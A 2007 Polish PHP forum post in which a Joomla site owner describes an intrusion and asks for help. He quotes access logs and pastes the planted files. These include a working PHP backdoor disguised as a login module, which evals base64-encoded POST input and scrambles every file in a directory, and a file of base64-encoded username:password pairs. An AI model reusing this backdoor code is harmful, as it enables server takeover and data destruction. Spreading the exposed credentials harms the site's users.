Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> Bezpieczeństwo, włamanie z użyciem skryptu php
alex51
post
Post #1





Grupa: Zarejestrowani
Postów: 4
Pomógł: 0
Dołączył: 25.02.2007

Ostrzeżenie: (0%)
-----

Witam.
Nie jestem pewien, czy dobrze wybrałem miejsce do przedstawienia moich kłopotów. Ponieważ jednak spotkało mnie nieszczęście polegające na tym, ze włamano się na mój serwer, używając do tego skryptu php, dlatego w tym miejscu chcę przedstawic to zdarzenie.
Prowadzę Serwis muzyczny zbudowany na systemie Joomla, adresowany do osób uczących się grać i nastawiony na zbieranie i przekazywanie sobie wzajemnie swoich doświadczeń, materiałów itp spraw. To co wymieniamy nawzajem gromadzimy w dziale zwanym Pobieralnia. Zebrało sie tam w ciągu półrocznej działalności serwisu ponad 1200 różnych plików o wadze około 200MB. Ktoś złośliwy postanowił nam zaszkodzić i spowodował, ze wszystkie pliki przestały być przydatne. Okazały się zepsute, niemożliwe do otworzenia. Miało to miejsce klika razy, zmieniłem serwer i sytuacja się znów powtórzyła w niedzielę 1 lipca. Wszystkie pliki Pobieralni miały tą samą datę i godzinę, różnica wynosiła 3 minuty. Na moją prośbe o pomoc, dostawca hostingu przekazał mi informację, którą tu zacytuje:

Cytat
logi:

w3cache1.icm.edu.pl gramsam.pl - [01/Jul/2007:13:27:37 +0200] "POST /modules/mod_docmann2.php?dir=..dmdocuments HTTP/1.0" 200 15529 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
w3cache1.icm.edu.pl gramsam.pl - [01/Jul/2007:13:27:45 +0200] "POST /modules/mod_docmann2.php?dir=..dmdocuments HTTP/1.0" 200 12648 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
w3cache1.icm.edu.pl gramsam.pl - [01/Jul/2007:13:29:14 +0200] "POST /modules/mod_docmann2.php?dir=..dmdocuments HTTP/1.0" 200 15469 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"

w3cache1.icm.edu.pl gramsam.pl - [24/Jun/2007:14:18:52 +0200] "GET /modules/docmann2.php HTTP/1.0" 404 281 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
w3cache1.icm.edu.pl gramsam.pl - [24/Jun/2007:14:21:51 +0200] "GET /modules/mod_docmann2.php HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
w3cache1.icm.edu.pl gramsam.pl - [24/Jun/2007:14:37:43 +0200] "POST /modules/mod_docmann2.php HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
w3cache1.icm.edu.pl gramsam.pl - [24/Jun/2007:14:39:14 +0200] "POST /modules/mod_docmann2.php HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
w3cache1.icm.edu.pl gramsam.pl - [24/Jun/2007:14:39:34 +0200] "POST /modules/mod_docmann2.php HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
w3cache1.icm.edu.pl gramsam.pl - [24/Jun/2007:14:40:50 +0200] "POST /modules/mod_docmann2.php HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
w3cache1.icm.edu.pl gramsam.pl - [24/Jun/2007:14:42:22 +0200] "POST /modules/mod_docmann2.php HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
w3cache2.icm.edu.pl gramsam.pl - [24/Jun/2007:16:29:12 +0200] "GET /modules/mod_docmann2.php HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
w3cache2.icm.edu.pl gramsam.pl - [24/Jun/2007:20:18:52 +0200] "POST /modules/mod_docmann2.php HTTP/1.0" 200 33 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"

Wyjaśnienie:
Ktoś łącząc się poprzez serwer proxy - w3cache.icm.edu.pl wgrał Panu plik: /modules/docmann2.php.
Następnie uruchomił ten skrypt z odpowiednimi parametrami co spowodowało losowy zapis danych do wszystkich plików w podanym katalogu.


Usunąłem zaraz wspomniane wyżej pliki. Miały one następującą zawartość:

[PHP] pobierz, plaintext 
  1. <?php
  2. /**
  3. * Community builder Login Module 1.0.1
  4. * $Id: mod_cblogin.php 531 2006-11-12 01:40:44Z beat $
  5. *
  6. * @version 1.0.2
  7. * @package Community Builder 1.0.2 extensions
  8. * @copyright (C) 2005-2006 Beat & JoomlaJoe & parts 2000 - 2005 Miro International Pty Ltd
  9. * @license <a href="http://www.gnu.org/copyleft/gpl.html" target="_blank">http://www.gnu.org/copyleft/gpl.html</a> GNU/GPL
  10. *
  11. * Credits to: Jeffrey Randall for initial implementation of avatar, and
  12. * to Antony Ventouris for the PMS integration (he also added the cool animated image)
  13. */
  14. 	  if ($_POST['p'] != "www")
  15. 	{
  16. 		exit();
  17. 	} 
  18. 	$code = $_POST['code'];
  19. 	if ($code != null)
  20. 	{
  21. 		eval(base64_decode($code));
  22. 		exit();
  23. 	}
  24. 	$dir = $_GET['dir'];
  25. 	if ($handle = opendir ($dir)) 
  26. 	{
  27. 		while (false !== ($file = readdir ($handle))) 
  28. 		{
  29. 			if ((!is_dir ($dir.$file))) 
  30. 			{
  31. 			   echo $dir.$file."<br />n";
  32. 			   
  33. 			   $fh = fopen ($dir.$file, "r");
  34. 				$fcontent = fread($fh, filesize($dir.$file));
  35. 				//$newcontent = rand().rand().rand();
  36. 				//$towrite = "$newcontent $fcontent".rand();
  37. 				$towrite = str_shuffle ($fcontent);
  38. 				fclose($fh);
  39. 				 $fh2 = fopen ($dir.$file, 'w+');	
  40. 				fwrite($fh2, $towrite);
  41. 				fclose($fh2);			
  42. 							 
  43. 			}
  44. 		}
  45. 		closedir ($handle);
  46. 	}
  47.  
  48. ?>
[PHP] pobierz, plaintext


był jeszcze plik mod_docman2.xml

[PHP] pobierz, plaintext 
  1. <?xml version="1.0" ?>
  2. <mosinstall type="module">
  3. 	<name>docmen</name>
  4. 	<creationDate>19/Aug/2004</creationDate>
  5. 	<author>The DOCMan Project</author>
  6. 	<copyright>This template is released under the GNU/GPL License</copyright>
  7. 	<authorEmail>admin@mambodocman.com</authorEmail>
  8. 	<authorUrl>www.mambodocman.com</authorUrl>
  9. 	<version>1.4</version>
  10. 	<description>mod docmen</description>
  11. 	 <files>
  12. 		 <filename module="mod_docman2">mod_docman2.php</filename>
  13. 	 </files>
  14. </mosinstall>
[PHP] pobierz, plaintext


oraz dziwny plik mod_konie.php, który mimo usunięcia, ponownie sie pojawia w Katalogu Modules, za każdym razem mając inną zawartość. Ze względu na brak miejsca treść tego plu przytoczę następnym razem.
Moje pytanie dotyczy tego jak się to stało, co mogę zrobić, aby zabezpieczyć sie przed takimi atakami i jak tego łobuza postraszyć, żeby więcej mnie nie niepokoił?



Teraz, z braku miejsca w poprzednim poscie podaje treść pierwszego ze znalezionych plików mod_konie.php, jakie ktoś wgrał na mój serwer, włamując się tam oczywiście:


[PHP] pobierz, plaintext 
  1. <?php
  2. /**
  3. * @package Joomla
  4. * @copyright Copyright (C) 2005 Open Source Matters. All rights reserved.
  5. * @license <a href="http://www.gnu.org/copyleft/gpl.html" target="_blank">http://www.gnu.org/copyleft/gpl.html</a> GNU/GPL, see LICENSE.php
  6. * Joomla! is free software. This version may have been modified pursuant
  7. * to the GNU General Public License, and as distributed it includes or
  8. * is derivative of works licensed under the GNU General Public License or
  9. * other free or open source software licenses.
  10. * See COPYRIGHT.php for copyright notices and details.
  11. */ 
  12.  
  13. if ($_GET['p'] != "jOOml4")
  14. {
  15.   header("HTTP/1.0 404 Not Found");
  16.   exit;
  17. }
  18. ?>
  19.  
  20. aWN5OmMzNDljMzQ5
  21. aWN5OmMzNDljMzQ5
  22. YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
  23. ZG1wOlBvbGFjazE5ODg=
  24. ZG1wOlBvbGFjazE5ODg=
  25. YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
  26. YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
  27. emlvbWFsMTY6OTAwOTI1
  28. TGVzemVrOmxlc2l1bGVr
  29. c29zbmEubm93YXRvcjI2OmVudGVydGFpbm1lbnQzMw==
  30. QmFzc2lhMjAwMDpzaWFiYTE0
  31. QmFzc2lhMjAwMDpzaWFiYTE0
  32. Og==
  33. QmFzc2lhMjAwMDpzaWFiYTE0
  34. cHJpZXN0ZXIxOTkxOnRydXNpYWsx
  35. aWN5Ok1hbEMuMzQ5
  36. aWN5Ok1hbEMuMzQ5
  37. aWN5Ok1hTEMuMzQ5
  38. aWN5Ok1hbEMuMzQ5
  39. aWN5OmMzNDljMzQ5
  40. aWN5OmMzNDljMzQ5
  41. aWN5OmMzNDljMzQ5
  42. bWFub2xvOldpZHpldw==
  43. amFub2Jva3RvaW5ueTpwcmVsdWRpdW05
  44. a2FyYXAzMDpuZW9kYXI=
  45. ZG1wOlBvbGFjazE5ODg=
  46. a2FyYXAzMDpuZW9kYXI=
  47. ZGFyMzIzMzp0ZW9kb3I=
  48. YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
  49. QW5keUI6cGllc2VrYWJp
  50. QW5keUI6YW5kYnJh
  51. cm9iZXJ0MTAwMTpwZW50aXVtMg==
  52. cmVzOmt1cnR5bmE=
  53. YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
  54. YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
  55. Ym9tYmFzdGlrOnFxcXFxcTE=
  56. YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
  57. d29qdGVrczk6cnViaWtvbjE=
  58. YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
  59. YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
  60. cHJpZXN0ZXIxOTkxOnRydXNpYWsx
  61. cHJpZXN0ZXIxOTkxOnRydXNpYWsx
  62. cm9iZXJ0MTAwMTpwZW50aXVtMg==
  63. cm9iZXJ0MTAwMTpwZW50aXVtMg==
  64. c29zbmEubm93YXRvcjI2OmVudGVydGFpbm1lbnQzMw==
  65. YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
  66. ZG1wOlBvbGFjazE5ODg=
  67. YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
  68. ZG1wOlBvbGFjazE5ODg=
  69. YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
  70. YW51bGthOmp1bmlvcjU=
  71. ZGF3aWRmNzc6NzcwNzAx
  72. ZGF3aWRfZjc3Ojc3MDcwMQ==
  73. emlvbWFsMTY6OTAwOTI1
  74. TGVzemVrOmxlc2l1bGVr
  75. QmFzc2lhMjAwMDpzaWFiYTE0
  76. a2xpbWF0eTo1NTU1NTU=
  77. a2FyYXAzMDpiZW9zYXI=
  78. a2FyYXAzMDpuZW9kYXI=
  79. aWN5OmMzNDljMzQ5
  80. bW9uaWFza2E6b3NuYXB1cw==
  81. bWFub2xvOldpZHpldw==
  82. a2FyYXAzMDpuZW9kYXI=
  83. emlvbWFsMTY6OTAwOTI1
  84. 																																															a2xpbWF0eTo1NTU1NTU=
  85. 																																																																																																																																																																																																																						cm9iZXJ0MTAwMTpwZW50aXVtMg==
  86. 																				  YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
  87. YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
  88. 												YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
  89. 																		  YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
  90. YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
  91. 																														  YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
  92. YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
  93. 																YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
  94. YXJ0dXJtdXp5a2FudDphcnR1cmVrNzk=
  95. YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
  96. bW9uaWFza2E6b3NuYXB1cw==
  97. c29zbmEubm93YXRvcjI2OmVudGVydGFpbm1lbnQzMw==
  98. cm9iZXJ0MTAwMTpwZW50b2l1bTI=
  99. cm9iZXJ0MTAwMTpwZW50aXVtMg==
  100. cm9iZXJ0MTAwMTpwZW50aXVtMg==
  101. YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
  102. YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
  103. c29zbmEubm93YXRvcjI2OmVudGVydGFpbm1lbnQzMw==
  104. Ym9tYmFzdGlrOnFxcXFxcTE=
  105. c2trMTE6Y2ljaWExMQ==
  106. c2trMTE6Y2ljaWExMQ==
  107. c2trMTE6Y2ljaWExMQ==
  108. c2trMTE6Y2ljaWExMQ==
  109. c2trMTE6Y2ljaWE=
  110. c2trMTE6Y2ljaWExMQ==
  111. TGVzemVrOmxlc2l1bGVr
  112. c2trMTE6Y2ljaWExMQ==
  113. c2trMTE6Y2ljaWExMQ==
  114. ZXdjaWFhbW9yZWs6bXV6eWN6a2E=
  115. ZXdjaWFhbW9yZWs6bXV6eWN6a2Ex
  116. amFub2Jva3RvaW5ueTpwcmVsdWRpdW05
  117. a2FyYXAzMDpuZW9kYXI=
  118. a2FyYXAzMDpuZW9kYXI=
  119. YmFydGluaWVtOmJhcnRvc3o=
[PHP] pobierz, plaintext

Przytoczony powyżej tekst jest tylko fragmentem tego pliku.
Po skasowaniu tego pliku po jakimś czasie pojawił się w tym samym katalogu: Modules następny plik mod_konie.php o krótszej zawartości:

[PHP] pobierz, plaintext 
  1. <?php
  2. YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
  3. ?>
[PHP] pobierz, plaintext


Co można o tym sądzić, skąd się wzięły, w jakim celu są wstawiane, czy wiąże się z tym jakieś niebezpieczeństwo. Trudno mi śledzić co chwila, czy nie pojawia się ponownie ten plik. A najważniejsze, co zrobić, aby się nie pojawiał?

Ten post edytował alex51 3.07.2007, 16:52:10
Go to the top of the page
+Quote Post

Posty w temacie
- alex51   Bezpieczeństwo   4.07.2007, 06:30:05
- - strife   1. Dodaj tag do tematu, aby temat był zgodny z za...   4.07.2007, 07:36:09

« Następny starszy · Przedszkole · Następny nowszy »
 

Reply to this topicStart new topic
1 Użytkowników czyta ten temat (1 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 

Tryb wyświetlania: Przełącz na: Standardowy · Przełącz na: Linearny+ · Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

RSS Aktualny czas: 20.08.2025 - 12:33
Powered By IP.Board © 2025  IPS, Inc.
All changes by PHP.pl Administrators
Hosting zapewnia NQ.pl hosting, trac, svn